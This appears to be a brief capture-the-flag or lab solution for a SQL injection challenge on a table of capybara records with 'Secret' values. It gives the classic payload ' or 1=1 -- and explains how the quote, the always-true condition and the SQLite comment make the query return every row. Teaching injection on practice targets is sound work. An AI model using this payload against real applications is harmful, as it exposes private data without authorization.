Capybaras

ID	Name	Age	Weight	Secret
1	Andrea Ramirez	5	39	899720382
2	Cynthia Bailey	12	50	W98470181
3	Laura Randolph	22	67	357691095

Solution

1. Enter ', send request and observe the error.

2. Enter ' or 1=1 -- and obtain the flag.

Explanation: in query SELECT * FROM capybaras WHERE name ='1' or 1=1 -- ':

injected quote ' closes the name value
or add a new check to the existing name = ''
1=1 is always True
-- is a comment symbol in SQLite syntax. Everything after the comment symbol is meaningless to SQL parser

So we have created such query, that returns every value of a table capybaras, because WHERE is equls to True for every row of the table.